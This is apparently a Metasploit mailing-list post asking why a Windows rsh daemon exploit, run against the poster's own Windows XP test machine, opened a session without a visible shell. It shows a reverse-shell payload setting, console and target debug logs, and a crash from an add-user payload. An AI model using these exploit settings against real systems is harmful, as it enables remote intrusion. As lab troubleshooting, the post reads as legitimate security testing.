[framework] easy one to answer: getting started on windows rsh daemon exploit

[Timothy McGuire]

I installed rsh daemon version 1.8 on an old machine of mine(Windows XP
SP2)  for testing.
I am running rsh daemon in debug mode.  Here is what I see on the target
machine:

Client Port: 1002...
[15] Sending null byte result...
[15] Executing '#r+e}83 ..... etc, etc, etc, etc ....... PAA
>C:\DOCUME~1\myname\LOCALS~1\temp\s648.m
2>C:\DOCUME~1\myname\LOCALS~1\Temp\s648.n'...
> was unexpected at this time.
[15] sending results...
*** [15] ERROR: Cannot open temporary file...
[15] Winsock error: Error number = 12.

my settings:
payload = shell_reverse_tcp
CPORT = 1008


in the metasploit console, I see:
[*] Started bind handler
[*] Trying target Windows XP Pro SP2 English...
[*] Command shell session 6 opened (00.00.00.104:52294 -> 00.00.00.106:1021)


and then it gives me back the msf exploit (windows_rsh) prompt

it seems like it worked, but I'm not seeing a shell.  should there be one?
Should I be focusing on the errors I see on the remote machine?

Later,  I tried the install user payload, I saw an error that the password
did not meet complexity standards.
after that, rshd fell down and couldn't get back up.

Thanks for any insight.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20080515/a830322a/attachment.htm